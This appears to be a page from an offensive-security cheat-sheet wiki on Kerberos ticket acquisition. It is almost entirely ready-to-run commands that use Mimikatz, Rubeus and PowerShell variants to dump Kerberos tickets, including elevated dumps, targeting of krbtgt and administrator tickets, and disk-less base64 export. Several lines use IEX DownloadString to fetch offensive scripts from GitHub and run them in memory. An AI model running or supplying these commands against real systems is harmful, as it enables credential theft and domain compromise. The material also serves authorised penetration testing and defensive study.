Ticket Acquisition

Kerberos ticket acquisition

Requirements:

Unprivileged

Can extract Kerberos tickets for the current user context

Privileged (Elevated)

Can extract ALL Kerberos tickets on the given system

Tools

1) Mimikatz

Export to file methods

Export tickets (Preferred Method (More Accurate))

Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"

Alternative Method

Mimikatz.exe "token::elevate" "kerberos::list /export"

2) Invoke-Mimikatz

Load into memory

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1')

Export to file methods

Export tickets (Preferred Method (More Accurate))

Invoke-Mimikatz -Command '"token::elevate "sekurlsa::tickets /export"'

Alternative Method

Invoke-Mimikatz -Command '""token::elevate" "kerberos::list /export"'

Export to Base64 without touching disk

Invoke-Mimikatz -Command '"token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"'

3) Rubeus

Dump All

.\Rubeus.exe dump /nowrap

Dump Specified tickets that match a service

.\Rubeus.exe dump /service:krbtgt /nowrap
.\Rubeus.exe dump /service:HTTP /nowrap

Dump tickets for specified users

.\Rubeus.exe dump /user:administrator /nowrap

Both

.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap

4) Invoke-Rubeus

Load into memory

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')

Dump All

Invoke-Rubeus -Command "dump /nowrap"

Dump Specified tickets that match a service

Invoke-Rubeus -Command "dump /service:krbtgt /nowrap"
Invoke-Rubeus -Command "dump /service:HTTP /nowrap"

Dump tickets for specified users

Invoke-Rubeus -Command "dump /user:administrator /nowrap"

Both

Invoke-Rubeus -Command "dump /service:krbtgt /user:administrator /nowrap"

5) PowerShellKerberos

Load into memory and dump

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')

PreviousSilver Ticket NextKerberos ticket format conversion

Last updated 8 months ago

hashtagKerberos ticket acquisition

hashtagRequirements:

hashtagUnprivileged

hashtagPrivileged (Elevated)

hashtagTools

hashtag1) Mimikatz

hashtag2) Invoke-Mimikatz

hashtag3) Rubeus

hashtagDump tickets for specified users

hashtag4) Invoke-Rubeus

hashtag5) PowerShellKerberos